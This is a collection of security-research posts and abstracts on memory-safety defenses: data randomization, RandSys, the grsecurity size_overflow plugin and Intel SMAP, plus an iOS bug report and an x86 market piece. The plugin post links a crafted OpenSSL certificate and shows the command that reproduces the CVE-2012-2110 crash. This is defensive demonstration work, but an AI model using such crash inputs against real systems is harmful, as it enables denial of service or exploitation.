[19] Electric Fence - Memory Debugger, http://www.gnu.org/directory/devel/debug/ElectricFence.html.
[20] Huang, Y., Protection Against Exploitation of Stack and Heap Overflows, http://members.rogers.com/exurity/pdf/AntiOverflows.pdf.
[21] Necula, George C., Scott McPeak, and Westley Weimer, "CCured: Type-Safe Retrofitting of Legacy Code," 29th ACM Symposium on Principles of Programming Languages, 2002.
[22] Dean, D., E. Felten and D. Wallach, "Java Security: From HotJava to Netscape and Beyond," IEEE Symposium on Security and Privacy, 1996.
[23] The Last Stage of Delirium (LSD), Java and Java Virtual Machine Vulnerabilities and their Exploitation Techniques, http://www.lsd-pl.net/java_security.html.
[24] ISO JTC 1/SC 22/WG 14 - C, http://std.dkuug.dk/JTC1/SC22/WG14/index.html.
[25] ISO JTC 1/SC 22/WG 15 - POSIX.
[26] The GNU C Library Manual, http://www.gnu.org/manual/glibc-2.2.5/libc.html.
[27] Lea, D., A Memory Allocator.
[28] Wilson, P., M. Johnstone, M. Neely, and D. Boles, "Dynamic Storage Allocation: A Survey and Critical Review," International Workshop on Memory Management, 1995.
[29] Chiueh, T., and F. Hsu, "RAD: A Compile-time Solution to Buffer Overflow Attacks," 21st Conference on Distributed Computing Systems, 2001.
[30] WU-Ftpd File Globbing Heap Corruption Vulnerability.
[31] Sudo Password Prompt Heap Overflow Vulnerability.
[32] CVS Directory Request Double Free Heap Corruption Vulnerability.
[33] AIM IX Benchmarks, http://www.caldera.com/developers/community/contrib/aim.html.
[34] Mindcraft WebStone - The Benchmark for Web Servers.
[35] OSDB - The Open Source Database Benchmark.

Sursa: LISA '03
  15. Data Randomization

Cristian Cadar, Microsoft Research Cambridge, UK (cristic@stanford.edu); Periklis Akritidis, Microsoft Research Cambridge, UK (pa280@cl.cam.ac.uk); Manuel Costa, Microsoft Research Cambridge, UK (manuelc@microsoft.com); Jean-Phillipe Martin, Microsoft Research Cambridge, UK (jpmartin@microsoft.com); Miguel Castro, Microsoft Research Cambridge, UK (mcastro@microsoft.com)

Abstract

Attacks that exploit memory errors are still a serious problem. We present data randomization, a new technique that provides probabilistic protection against these attacks by xoring data with random masks. Data randomization uses static analysis to partition instruction operands into equivalence classes: it places two operands in the same class if they may refer to the same object in an execution that does not violate memory safety. Then it assigns a random mask to each class and it generates code instrumented to xor data read from or written to memory with the mask of the memory operand's class. Therefore, attacks that violate the results of the static analysis have unpredictable results. We implemented a data randomization prototype that compiles programs without modifications and can prevent many attacks with low overhead. Our prototype prevents all the attacks in our benchmarks while introducing an average runtime overhead of 11% (0% to 27%) and an average space overhead below 1%.

Download: research.microsoft.com/pubs/70626/tr-2008-120.pdf
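To make the xor-masking idea concrete, here is a tiny conceptual sketch in C. In the actual system the class partitioning comes from the static analysis and the instrumentation is emitted by the compiler; the function names and the hard-coded mask below are purely illustrative:

static unsigned int mask_class3 = 0x5a3c9f11u;  /* random mask for one equivalence class */

/* Every store/load whose operand belongs to this class is rewritten like so: */
void masked_store(unsigned int *p, unsigned int v) { *p = v ^ mask_class3; }
unsigned int masked_load(const unsigned int *p)    { return *p ^ mask_class3; }

/* An out-of-class write (e.g., via a corrupted pointer) uses the wrong mask,
   so the victim later reads back an unpredictably garbled value. */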
  16. Thwarting Code Injection Attacks with System Service Interface Randomization

Xuxian Jiang (George Mason University, xjiang@ise.gmu.edu), Helen J. Wang (Microsoft Research, helenw@microsoft.com), Dongyan Xu (Purdue University, dxu@cs.purdue.edu), Yi-Min Wang (Microsoft Research, ymwang@microsoft.com)

Abstract

Code injection attacks are a top threat to today's Internet. With zero-day attacks on the rise, randomization techniques have been introduced to diversify software and operating systems of networked hosts so that attacks that succeed on one process or one host cannot succeed on others. The two most notable system-wide randomization techniques are Instruction Set Randomization (ISR) and Address Space Layout Randomization (ASLR). The former randomizes the instruction set for each process, while the latter randomizes the memory address space layout. Both suffer from a number of attacks. In this paper, we advocate and demonstrate that by combining ISR and ASLR effectively, we can offer much more robust protection than each of them individually. However, a trivial combination of both schemes is not sufficient. To this end, we make the key observation that system call instructions matter the most to attackers for code injection. Our system, RandSys, uses system call instruction randomization and the general technique of ASLR, along with a number of new enhancements, to thwart code injection attacks. We have built a prototype for both Linux and Windows platforms. Our experiments show that RandSys can effectively thwart a wide variety of code injection attacks with a small overhead.

Keywords: Internet Security, Code Injection Attack, System Randomization

Download: research.microsoft.com/en-us/um/people/helenw/papers/randSys.pdf
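For readers unfamiliar with ISR, here is a generic sketch of the idea in C. This is the common xor-based flavor of instruction set randomization, not RandSys's specific system-call-instruction scheme:

#include <stddef.h>

/* Code bytes are xored with a per-process key at load time and de-xored at
   fetch/emulation time, so injected code that was never encoded with the
   key decodes to junk and crashes instead of executing. */
void isr_transform(unsigned char *code, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        code[i] ^= key;    /* xor is an involution: the same routine decodes */
}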
  17. Linux Security in 10 years Brad Spengler / grsecurity Download: grsecurity.net/spender_summit.pdf
  18. The Guaranteed End of Arbitrary Code Execution Online: http://grsecurity.net/PaX-presentation_files/frame.htm
  19. Inside the Size Overflow Plugin

by ephox » Tue Aug 28, 2012 5:30 pm

Hello everyone, my name is Emese (ephox). You may already know me for my previous project, the constify gcc plugin that pipacs took over and put into PaX. http://www.grsecurity.net/~ephox/const_plugin/

This time I would like to introduce to you a 1-year-old project of mine that entered PaX a few months ago. It's another gcc plugin called size_overflow whose purpose is to detect a subset of the integer overflow security bugs at runtime. https://grsecurity.net/~ephox/overflow_plugin/

On integer overflows briefly

In the C language integer types can represent a finite range of numbers. If the result of an arithmetic operation falls outside of the type's range (e.g., the largest representable value plus one) then the value overflows or underflows. This becomes a problem if the programmer didn't think of it, e.g., the size parameter of a memory allocator function becomes smaller due to the overflow. There is a very good description of integer overflows in Phrack: http://www.phrack.org/issues.html?issue ... 10#article

The history of the plugin

The plugin is based on spender's idea, the intoverflow_t type found in older PaX versions. This was a 64 bit wide integer type on 32 bit archs and a 128 bit wide integer type on 64 bit archs. There were wrapper macros for the important memory allocator functions (e.g., kmalloc) where the value to be put into the size argument (of size_t type) could be checked against overflow. For example:

#define kmalloc(size,flags) \
({ \
void *buffer = NULL; \
intoverflow_t overflow_size = (intoverflow_t)size; \
\
if (!WARN(overflow_size > ULONG_MAX, "kmalloc size overflow\n")) \
buffer = kmalloc((size_t)overflow_size, (flags)); \
buffer; \
})

This solution had a problem in that the size argument is usually the result of a longer computation that consists of several expressions. The intoverflow_t cast based check could only verify the last expression that was used as the argument to the allocator function, and even then it only helped if the type cast of the leftmost operand affected the other operands as well. Therefore if there was an integer overflow during the evaluation of the other expressions then the remaining computation would use the overflowed value, which the intoverflow_t cast cannot detect. Second, only a few basic allocator functions had wrapper macros because wrapping every function with a size argument would have been a big job and resulted in an unmaintainable patch. In contrast, the size_overflow plugin recomputes all subexpressions of the expression with a double wide integer type in order to detect overflows during the evaluation of the expression.

Internals of the size_overflow plugin

The compilation process is divided into passes, and a plugin can insert its own passes between or in place of them. Each pass has a specific task (e.g., optimization, transformation, analysis) and they run in a specific order on a translation unit (some optimization passes may be skipped depending on the optimization level). The plugin's pass (size_overflow_pass) executes after the "ssa" GIMPLE pass which is among the early GIMPLE passes. It's placed there to allow all the later optimization passes to properly optimize the code modified by the plugin.

Before I describe the plugin in more detail, let's look at some gcc terms. The gimple structure in gcc represents the statements (stmt) of the high level language.
For example this is what a function call (gimple_code: GIMPLE_CALL) looks like:

gimple_call <malloc, D.4425_2, D.4421_15>

or a subtract (gimple_code: GIMPLE_ASSIGN) stmt:

gimple_assign <minus_expr, D.4421_15, D.4464_12, a_5>

This stmt has 3 operands, one lhs (left hand side) and two rhs (right hand side) ones. Each variable is of type "tree" and has a name (SSA_NAME) and version number (SSA_NAME_VERSION) while we are in SSA (static single assignment) mode. As we can see, the parameter of malloc is the variable D.4421_15 (SSA_NAME: 4421, SSA_NAME_VERSION: 15) which is also the lhs of the assignment, so we have a use-def relation between the two stmts; that is, the defining statement (def_stmt) of the variable D.4421_15 is the D.4421_15 = D.4464_12 - a_5 stmt.

Further reading on SSA and GIMPLE:
SSA - GNU Compiler Collection (GCC) Internals
GIMPLE - GNU Compiler Collection (GCC) Internals

The plugin gets called for each function and goes through their stmts looking for calls to marked functions. In the kernel, functions can be marked in two ways:

- with a function attribute, for functions at the bottom of the function call hierarchy (e.g., copy_user_generic, __copy_from_user, __copy_to_user, __kmalloc, __vmalloc_node_range, vread)
- listed in a hash table (for functions calling the above basic functions)

In userland there is only a hash table (e.g., openssl). The present description covers the kernel.

The attribute

Plugins can define new attributes. This plugin defines a new function attribute which is used to mark the size parameters of interesting functions so that they can be tracked backwards. This is what the attribute looks like: __attribute__((size_overflow(1))) where the parameter (1) refers to the function argument (they are numbered from 1) that we want to check for overflow. In the kernel there is a #define for this attribute similarly to other attributes: __size_overflow(...). For example:

unsigned long __must_check clear_user(void __user *mem, unsigned long len) __size_overflow(2);

static inline void* __size_overflow(1,2) kcalloc(size_t n, size_t size, gfp_t flags)
{
...
}

Further documentation about attributes: Attributes - GNU Compiler Collection (GCC) Internals

The hash table

Originally we only had the attribute, similarly to the constify plugin, but in order to reduce the kernel patch size (e.g., in 3.5.1 2920 functions are marked) all functions except for the base ones are stored in a hash table. The hash table is generated by the tools/gcc/generate_size_overflow_hash.sh script from tools/gcc/size_overflow_hash.data into tools/gcc/size_overflow_hash.h. A hash table entry is described by the size_overflow_hash structure whose fields are the following:

- next: the hash chain pointer to the next entry
- name: name of the function
- param: an integer with bits set corresponding to the size parameters

For example this is what the hash entry of the include/linux/slub_def.h:kmalloc function looks like:

struct size_overflow_hash _000008_hash = {
.next = NULL,
.name = "kmalloc",
.param = PARAM1,
};

The hash table is indexed by a hash computed from numbers describing the function declarations (get_tree_code()).
Example:

struct size_overflow_hash *size_overflow_hash[65536] = {
[11268] = &_000008_hash,
};

The hash algorithm is CrapWow: http://www.team5150.com/~andrew/noncryptohashzoo/CrapWow.html

Enabling the size_overflow plugin in the kernel

in menuconfig (under PaX): Security options -> PaX -> Miscellaneous hardening features -> Prevent various integer overflows in function size parameters
.config (under PaX): CONFIG_PAX_SIZE_OVERFLOW
.config (without PaX): CONFIG_SIZE_OVERFLOW

stmt duplication with double wide integer types

When the plugin finds a marked function then it traces back the use-def chain of the parameter(s) defined by the function attribute. The stmts found recursively are duplicated using variables of double wide integer types. In some cases duplication is not the right strategy. In these cases the plugin takes the lhs of the original stmt and casts it to the double wide type:

- function calls (GIMPLE_CALL): they cannot be duplicated because they may have side effects. This also means that the current plugin version doesn't check if a function returns an overflowed value, see todo
- inline asm (GIMPLE_ASM): it may have side effects too
- taking the address of an object (ADDR_EXPR): todo
- pointers (MEM_REF, etc.): todo
- division (RDIV_EXPR, etc.): special case for the kernel because it doesn't support division with double wide types
- global variables: todo

If the marked function's parameter can be traced back to a parameter of the caller then the plugin checks if the caller is already in the hash table (or it is marked with the attribute). If it isn't then the plugin prints the following message:

Function %s is missing from the size_overflow hash table +%s+%d+%u+ (caller's name, parameter's number, hash)

If anyone sees this message, please send it to me by e-mail (re.emese@gmail.com) so that I can put the caller into the hash table, otherwise the plugin will not apply the overflow check to it.

Inserting the overflow checks

The plugin inserts overflow checks in the following cases:

- marked function parameters, just before the function call
- stmt with a constant operand, see gcc intentional overflow
- negations (BIT_NOT_EXPR)
- type cast stmts between these types:

---------------------------------
| from | to   | lhs  | rhs |
---------------------------------
| u32  | u32  | -    | !   |
| u32  | s32  | TODO | *!  |
| s32  | u32  | TODO | *!  |
| s32  | s32  | -    | !   |
| u32  | u64  | !    | !   |
| u32  | s64  | TODO | !   |
| s32  | u64  | TODO | !   |
| s32  | s64  | !    | !   |
| u64  | u32  | !    | !   |
| u64  | s32  | TODO | !   |
| s64  | u32  | TODO | !   |
| s64  | s32  | !    | !   |
| u64  | u64  | -    | !   |
| u64  | s64  | TODO | *!  |
| s64  | u64  | TODO | *!  |
| s64  | s64  | -    | !   |
---------------------------------

Legend:
from: source type
to: destination type
lhs: is the lhs checked?
rhs: is the rhs checked?
!: the plugin inserts an overflow check
TODO: would be nice to insert an overflow check, see todo
*!: the plugin inserts an overflow check except when the stmt's def_stmt is a MINUS_EXPR (subtraction)
-: no overflow check is needed

When the plugin finds one of the above cases then it will insert a range check against the double wide variable value (TYPE_MIN, TYPE_MAX of the original variable type). This guarantees that at runtime the value fits into the original variable's type range. If the runtime check detects an overflow then the report_size_overflow function will be called instead of executing the following stmt.
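In C terms, the effect of the duplication plus range check is roughly the following (the names here are illustrative; the plugin actually rewrites GIMPLE, as the dumps further below show):

#include <stddef.h>

/* assumed to exist elsewhere, as in the test program further below: */
void *coolmalloc(size_t size);
void report_size_overflow(const char *file, unsigned int line,
                          const char *func, const char *ssa_name);

/* original code: c = a * b + 10; coolmalloc(c); -- with a 32-bit size_t
   the plugin conceptually turns it into: */
void *alloc_checked(size_t a, size_t b)
{
    unsigned long long c_dup =
        (unsigned long long)a * b + 10;     /* double wide clone of the computation */
    if (c_dup > 0xffffffffULL)              /* TYPE_MAX of the original 32-bit type */
        report_size_overflow(__FILE__, __LINE__, __func__, "c_dup (max)");
    return coolmalloc((size_t)c_dup);       /* downcast clone feeds the marked call */
}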
The marked function's parameter is replaced with a variable cast down from its double wide clone so that gcc can potentially optimize out the stmts computing the original variable. If we uncomment the print_the_code_insertions function call in the insert_check_size_overflow function then the plugin will print out this message during compilation: "Integer size_overflow check applied here." This message isn't too useful because later passes in gcc will optimize out about 6 out of 10 insertions. If anyone is interested in the insertion count after optimizations then try this command (on the kernel):

objdump -drw vmlinux | grep "call.*report_size_overflow" | wc -l

report_size_overflow

The plugin creates the report_size_overflow declaration in the start_unit_callback, but the definition is always in the current program. The plugin inserts only the report_size_overflow calls. This is a no-return function. This function prints out the file name, the function name and the line number of the detected overflow. If the stmt's line number is not available in gcc then it prints out the caller's start line number. The last two strings are only debug information. The report_size_overflow function's message looks like this (without PaX it uses SIZE_OVERFLOW instead of PAX):

PAX: size overflow detected in function main tests/main12.c:27 cicus.4_21 (max)

In the kernel the report_size_overflow function is in fs/exec.c. The overflow message is sent to dmesg along with a stack backtrace and then it sends a SIGKILL to the process that triggered the overflow. In openssl the report_size_overflow function is in crypto/mem.c. The overflow message is sent to syslog and the triggering process is sent a SIGSEGV.

Plugin internals through a simple example

The source code (test.c):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

extern void *malloc(size_t size) __attribute__((size_overflow(1)));

void * __attribute__((size_overflow(1))) coolmalloc(size_t size)
{
return malloc(size);
}

void report_size_overflow(const char *file, unsigned int line, const char *func, const char *ssa_name)
{
printf("SIZE_OVERFLOW: size overflow detected in function %s %s:%u %s", func, file, line, ssa_name);
_exit(1);
}

int main(int argc, char *argv[])
{
unsigned long a;
unsigned long b;
unsigned long c = 10;

a = strtoul(argv[1], NULL, 0);
b = strtoul(argv[2], NULL, 0);
c = c + a * b;
return printf("%p\n", coolmalloc(c));
}

Compile the plugin:

gcc -I`gcc -print-file-name=plugin`/include/c-family -I`gcc -print-file-name=plugin`/include -fPIC -shared -O2 -o size_overflow_plugin.so size_overflow_plugin.c

Compile test.c with the plugin and dump its ssa representations:

gcc -fplugin=size_overflow_plugin.so test.c -O2 -fdump-tree-all

Each dumpable gcc pass is dumped by -fdump-tree-all. This blog post focuses on the ssa and the size_overflow passes. The marked function is coolmalloc, the traced parameter is c_12.
The main function's ssa representation is below, just before executing the size_overflow pass (test.c.*.ssa*):

main (int argc, char * * argv)
{
  long unsigned int c;
  long unsigned int b;
  long unsigned int a;
  const char * restrict D.3291;
  void * D.3290;
  int D.3289;
  long unsigned int D.3288;
  const char * restrict D.3287;
  char * D.3286;
  char * * D.3285;
  const char * restrict D.3284;
  char * D.3283;
  char * * D.3282;

<bb 2>:
  c_1 = 10;
  D.3282_3 = argv_2(D) + 4;
  D.3283_4 = *D.3282_3;
  D.3284_5 = (const char * restrict) D.3283_4;
  a_6 = strtoul (D.3284_5, 0B, 0);
  D.3285_7 = argv_2(D) + 8;
  D.3286_8 = *D.3285_7;
  D.3287_9 = (const char * restrict) D.3286_8;
  b_10 = strtoul (D.3287_9, 0B, 0);
  D.3288_11 = a_6 * b_10;
  c_12 = D.3288_11 + c_1;
  D.3290_13 = coolmalloc (c_12);
  D.3291_14 = (const char * restrict) &"%p\n"[0];
  D.3289_15 = printf (D.3291_14, D.3290_13);
  return D.3289_15;
}

After the size_overflow pass on a 32 bit arch (test.c.*size_overflow*):

main (int argc, char * * argv)
{
  long unsigned int cicus.7;
  long long unsigned int cicus.6;
  long long unsigned int cicus.5;
  long long unsigned int cicus.4;
  long long unsigned int cicus.3;
  long long unsigned int cicus.2;
  long unsigned int c;
  long unsigned int b;
  long unsigned int a;
  const char * restrict D.3291;
  void * D.3290;
  int D.3289;
  long unsigned int D.3288;
  const char * restrict D.3287;
  char * D.3286;
  char * * D.3285;
  const char * restrict D.3284;
  char * D.3283;
  char * * D.3282;

<bb 2>:
  c_1 = 10;
  cicus.5_24 = (long long unsigned int) c_1;
  D.3282_3 = argv_2(D) + 4;
  D.3283_4 = *D.3282_3;
  D.3284_5 = (const char * restrict) D.3283_4;
  a_6 = strtoul (D.3284_5, 0B, 0);
  cicus.2_21 = (long long unsigned int) a_6;
  D.3285_7 = argv_2(D) + 8;
  D.3286_8 = *D.3285_7;
  D.3287_9 = (const char * restrict) D.3286_8;
  b_10 = strtoul (D.3287_9, 0B, 0);
  cicus.3_22 = (long long unsigned int) b_10;
  D.3288_11 = a_6 * b_10;
  cicus.4_23 = cicus.2_21 * cicus.3_22;
  c_12 = D.3288_11 + c_1;
  cicus.6_25 = cicus.4_23 + cicus.5_24;
  cicus.7_26 = (long unsigned int) cicus.6_25;
  if (cicus.6_25 > 4294967295)
    goto <bb 3>;
  else
    goto <bb 4>;

<bb 3>:
  report_size_overflow ("test.c", 28, "main", "cicus.6_25 (max)\n");

<bb 4>:
  D.3290_13 = coolmalloc (cicus.7_26);
  D.3291_14 = (const char * restrict) &"%p\n"[0];
  D.3289_15 = printf (D.3291_14, D.3290_13);
  return D.3289_15;
}

Some problems encountered during development

- gcc intentional overflow: Gcc can produce unsigned overflows while transforming expressions, e.g., it can transform constants that will produce the correct result with unsigned overflow on the given type (e.g., a-1 -> a+4294967295). The plugin used to detect this (false positive) overflow at runtime. The solution is to not duplicate such stmts that contain constants. Instead, the plugin inserts an overflow check for the non-constant rhs before that stmt and uses its lhs (cast to the double wide type) in later duplication. For example on 32 bit: coolmalloc(a * b - 1 + argc)

before the size_overflow plugin:
...
D.4416_10 = a_5 * b_9;
D.4418_13 = D.4416_10 + argc.0_12;
D.4419_14 = D.4418_13 + 4294967295;
D.4420_15 = coolmalloc (D.4419_14);
...

after the size_overflow plugin:
...
D.4416_10 = a_5 * b_9;
cicus.7_25 = cicus.4_22 * cicus.6_24;
D.4418_13 = D.4416_10 + argc.0_12;
cicus.9_27 = cicus.7_25 + cicus.8_26;
cicus.10_28 = (unsigned int) cicus.9_27;
cicus.11_29 = (long long unsigned int) cicus.9_27;
if (cicus.11_29 > 4294967295)
  goto <bb 3>;
else
  goto <bb 4>;

<bb 3>:
report_size_overflow ("test.c", 28, "main");

<bb 4>:
D.4419_14 = cicus.10_28 + 4294967295;
cicus.12_30 = (long long int) D.4419_14;
...
- when a size parameter is used for more than one purpose (not just for size): The plugin cannot recognize this case. When I get a false positive report I remove the function from the hash table.
- type casts from gcc or the programmer causing intentional overflows. This is the reason for the TODOs in the cast handling table above.

Detecting a real security issue

I'll demonstrate the plugin on an openssl 1.0.0 bug (CVE-2012-2110). The overflow can be reproduced with this test case: http://lock.cmpxchg8b.com/openssl-1.0.1-testcase-32bit.crt.gz

Download the plugin source (or use the ebuild) from here: https://grsecurity.net/~ephox/overflow_plugin/

Download the openssl patch (that contains the report_size_overflow function): http://grsecurity.net/~ephox/overflow_plugin/userland_patches/openssl-1.0.0/

Compile openssl with the plugin (see the README); after that we can reproduce the bug:

openssl-1.0.0.h/bin $ ./openssl version
OpenSSL 1.0.0h 12 Mar 2012
openssl-1.0.0.h/bin $ ./openssl x509 -in ../../openssl-1.0.1-testcase-32bit.crt -text -noout -inform DER
Segmentation fault

In syslog there is the plugin's message:

SIZE_OVERFLOW: size overflow detected in function asn1_d2i_read_bio a_d2i_fp.c:228 cicus.69_205 (max)

I'll have more (gentoo) ebuilds if anyone wants to use the plugin in userland (for now only openssl): http://grsecurity.net/~ephox/overflow_plugin/gentoo/

Performance impact

hardware: quad core sandy bridge
kernel version: 3.5.1
patch: pax-linux-3.5.1-test16.patch
overflow checks after optimization (gcc-4.7.1): 931

With the size_overflow plugin disabled:

Performance counter stats for 'du -s /test' (10 runs):

4345.283145 task-clock # 0.983 CPUs utilized ( +- 0.12% )
1,107 context-switches # 0.255 K/sec ( +- 0.09% )
0 CPU-migrations # 0.000 K/sec ( +-100.00% )
3,763 page-faults # 0.866 K/sec ( +- 0.13% )
14,641,126,270 cycles # 3.369 GHz ( +- 0.03% )
4,228,389,062 stalled-cycles-frontend # 28.88% frontend cycles idle ( +- 0.06% )
1,962,172,809 stalled-cycles-backend # 13.40% backend cycles idle ( +- 0.23% )
25,463,911,605 instructions # 1.74 insns per cycle # 0.17 stalled cycles per insn ( +- 0.01% )
6,968,592,408 branches # 1603.714 M/sec ( +- 0.01% )
47,230,732 branch-misses # 0.68% of all branches ( +- 0.07% )

4.419888484 seconds time elapsed ( +- 0.12% )

With the size_overflow plugin enabled:

Performance counter stats for 'du -s /test' (10 runs):

4291.088943 task-clock # 0.983 CPUs utilized ( +- 0.08% )
1,093 context-switches # 0.255 K/sec ( +- 0.08% )
0 CPU-migrations # 0.000 K/sec
3,761 page-faults # 0.877 K/sec ( +- 0.15% )
14,481,436,247 cycles # 3.375 GHz ( +- 0.05% )
4,155,959,526 stalled-cycles-frontend # 28.70% frontend cycles idle ( +- 0.15% )
2,003,994,250 stalled-cycles-backend # 13.84% backend cycles idle ( +- 0.54% )
25,436,031,783 instructions # 1.76 insns per cycle # 0.16 stalled cycles per insn ( +- 0.00% )
6,960,975,325 branches # 1622.193 M/sec ( +- 0.00% )
47,125,984 branch-misses # 0.68% of all branches ( +- 0.07% )

4.365185965 seconds time elapsed ( +- 0.08% )

TODO: I don't know why it was faster with the plugin on these tests.

During compilation it didn't cause too much slowdown (0.077s only).
Allyesconfig kernel statistics after optimization (number of calls to report_size_overflow, gcc-4.6.2):

3.5.0:
  vmlinux_4.6.x_i386-yes: 2556
  vmlinux_4.6.x_x86_64-yes: 2659
3.2.26:
  vmlinux_4.6.x_i386-yes: 2657
  vmlinux_4.6.x_x86_64-yes: 2756
2.6.32.59:
  vmlinux_4.6.x_i386-yes: 1893
  vmlinux_4.6.x_x86_64-yes: 2353

Future plans

- enable the plugin to compile C++ sources
- compile the following programs with the plugin:
  - glibc: I tried to compile it already, but the make system doesn't like my report_size_overflow function, so I'll try again later
  - glib
  - syslog-ng: I don't yet know where to report the overflow message (chicken and egg problem)
  - firefox
  - chromium
  - samba
  - apache
  - php
  - the Android kernel
  - anything with an integer overflow CVE
- plugin internals plans:
  - print out the overflowed value in the report message
  - comments
  - optimization: use unlikely/__builtin_expect for the inserted checks
  - if an expression can be tracked back to the result of a function call, then the function's return value should be tracked back as well
  - handle ADDR_EXPR
  - make use of LTO (gcc 4.7+): it could get rid of the hash table
  - an llvm size_overflow plugin
  - an IPA pass to be able to track back across static functions within a translation unit; it would shrink the hash table
  - handle function pointers
  - handle struct fields
  - fix this side effect: warning: call to 'copy_to_user_overflow' declared with attribute warning: copy_to_user() buffer size is not provably correct
  - solve all the TODO items in the cast handling table

If anyone's interested in compiling other userland programs with the plugin, please send me the resulting hash table and patch.

Sursa: grsecurity forums • View topic - Inside the Size Overflow Plugin
  20. [h=3]Supervisor Mode Access Prevention[/h]

by PaX Team » Fri Sep 07, 2012 9:05 pm

With the latest release of their Architecture Instruction Set Extensions Programming Reference, Intel has finally lifted the veil on a new CPU feature set to debut in next year's Haswell line of processors. This new feature is called Supervisor Mode Access Prevention (SMAP), and there's a reason why its name so closely resembles Supervisor Mode Execution Prevention (SMEP), the feature that debuted with Ivy Bridge processors a few months ago. While the purpose of SMEP is to control instruction fetches and code execution from supervisor mode (traditionally used by the kernel component of operating systems), SMAP is concerned with data accesses from supervisor mode. In particular, SMEP, when enabled, prevents code execution from userland memory pages by the kernel (the favourite exploit technique against kernel security bugs), whereas SMAP will prevent unintended data accesses to userland memory.

The twist in the story, and the reason why these security features couldn't be implemented as one, lies in the fact that the kernel does have a legitimate need to access data in userland memory at times, while no contemporary kernel needs to execute code from there. In other words, while SMEP can be enabled unconditionally by flipping a bit at boot time, SMAP needs more care because it has to be disabled/enabled around legitimate accessor functions in the kernel. Intel has added two new instructions for this very purpose (CLAC/STAC) and repurposed the alignment check status bit in supervisor mode to enable quick switching around SMAP at runtime (a minimal sketch of how an accessor might use them follows below). This will require more extensive changes in kernel code than SMEP did, but the amount of code is still quite manageable. Third party kernel modules that don't use the kernel's userland accessor functions will have to take care of switching SMAP on/off themselves.
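To make the CLAC/STAC mechanism concrete, here is a minimal illustrative sketch (an editor's addition, not PaX or actual kernel code) of how a userland accessor could bracket its single intended user-space dereference; real kernels hide this behind macros and patch the instructions in only on SMAP-capable CPUs:

/* illustrative only: requires a SMAP-aware assembler for stac/clac */
static inline unsigned char get_user_byte(const unsigned char *user_ptr)
{
        unsigned char val;

        asm volatile("stac" ::: "cc", "memory"); /* set EFLAGS.AC: allow supervisor access to user pages */
        val = *user_ptr;                         /* the one legitimate userland read */
        asm volatile("clac" ::: "cc", "memory"); /* clear EFLAGS.AC: SMAP enforced again */
        return val;
}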
What does SMAP mean for PaX? The situation is similar to last year's SMEP, which made an efficient implementation of (partial) KERNEXEC possible on amd64 (i386/KERNEXEC continues to rely on segmentation instead, which provides better protection than SMEP can). SMAP's analog feature in PaX is called UDEREF, which so far couldn't be efficiently implemented on amd64 (once again, i386/UDEREF will continue to rely on segmentation to provide better userland/kernel separation than SMAP can). Beyond allowing an efficient implementation of UDEREF, there'll be other uses for SMAP (or perhaps a future variant of it) in PaX: sealed kernel memory whose access is carefully controlled even for kernel code itself.

What does SMAP mean for security? Similarly to UDEREF, an SMAP enabled kernel will be prevented from accessing userland memory in unintended ways, e.g., attacker controlled pointers can no longer target userland memory directly, and even simple kernel bugs such as NULL pointer based dereferences will just trigger a CPU exception instead of letting the attacker take over kernel data flow. Coupled with SMEP, this means that future exploits against memory corruption bugs will have to rely entirely on targeting kernel memory (which has been the case under UDEREF/KERNEXEC for many years now). This in turn means that detailed knowledge of runtime kernel memory will become a premium for reliable exploitation, therefore abusing bugs that leak kernel memory to userland will become the first step towards exploiting memory corruption bugs.

While UDEREF and SMAP prevent gratuitous memory leaks, they still have to allow intended userland accesses, and that is exactly the escape hatch that several exploits have already targeted; we can expect more in the future. Fortunately, we are once again at the forefront of this game with several features that prevent, or at least greatly reduce, the amount of information that can be so leaked from the kernel to userland (HIDESYM, SANITIZE, SIZE_OVERFLOW, STACKLEAK, USERCOPY).

TL;DR: Intel implements a UDEREF equivalent 6 years after PaX; PaX will make use of it on amd64 for improved performance.

Sursa: grsecurity forums • View topic - Supervisor Mode Access Prevention
  21. iOS 6 Javascript Bug Raises Potential Security And Privacy Questions

By Istvan Fekete, last updated December 23, 2012

iOS 6 Safari has a potentially serious Javascript bug, which could have some serious security and privacy implications. According to a report from AppleInsider, users who toggle off Javascript in the iOS 6 Safari web browser are not totally in the clear: when a visited website uses a Smart App Banner (the feature that lets developers promote App Store software from within Safari), Javascript is automatically toggled back on without the user being notified.

You can check out this bug by opening the Settings app, choosing Safari, and turning off Javascript. Then you can visit this test page using your iPhone's browser. As you will see, it will turn Javascript back on without notifying you.

Peter Eckersley, technology products director with the digital rights advocacy group the Electronic Frontier Foundation, said he would characterize such an issue as a "serious privacy and security vulnerability." Neither Eckersley nor the EFF had heard of the iOS 6 bug before, nor had they independently tested to confirm that the issue could be replicated. But Eckersley said that if the problem is in fact real, it's something that Apple should work to address as quickly as possible.

"It is a security issue, it is a privacy issue, and it is a trust issue," Eckersley said. "Can you trust the UI to do what you told it to do? It's certainly a bug that needs to be fixed urgently."

According to the report, this issue has existed ever since iOS 6 went public, and the recent iOS 6.0.1 and 6.0.2 updates didn't patch it. Furthermore, the bug isn't iPhone specific: it applies to all iDevices running iOS 6, and even the iOS 6.1 beta seems to carry it as well.

Sursa: iOS 6 Javascript Bug Raises Potential Security And Privacy Questions | Jaxov
  22. The End of x86? An Update

by mjfern on December 21, 2012

In October 2010, I predicted the disruption of the x86 architecture, along with its major proponents Intel and AMD. The purpose of this current article is to reassess that prediction in light of recent events. Below, I present the classic signs of disruption (drawing on Christensen's framework), my original arguments (indented as quotes), and then an update.

1. The current technology is overshooting the needs of the mass market.

    Due to a development trajectory that has followed in lockstep with Moore's Law, and the emergence of cloud computing, the latest generation of x86 processors now exceeds the performance needs of the majority of customers. Because many customers are content with older generation microprocessors, they are holding on to their computers for longer periods of time, or, if purchasing new computers, are seeking out machines that contain lower performing and less expensive microprocessors.

x86 shipments dropped by 9% in Q3 2012. Furthermore, the expected surge in PC sales (and x86 shipments) in Q4 due to the release of Windows 8 has failed to materialize. NPD data indicates that Windows PC sales in U.S. retail stores fell a staggering 21% in the four-week period from October 21 to November 17, compared to the same period the previous year. [1] In short, there is now falling demand for x86 processors. Computer buyers are shifting their spending from PCs to next generation computing devices, including smartphones and tablets.

2. A new technology emerges that excels on different dimensions of performance.

    While the x86 architecture excels on processing power – the number of instructions handled within a given period of time – the ARM architecture excels at energy efficiency. According to Data Respons (datarespons.com, 2010), an "ARM-based system typically uses as little as 2 watts, whereas a fully optimized Intel Atom solution uses 5 or 6 watts." The ARM architecture also has an advantage in form factor, enabling OEMs to design and produce smaller devices.

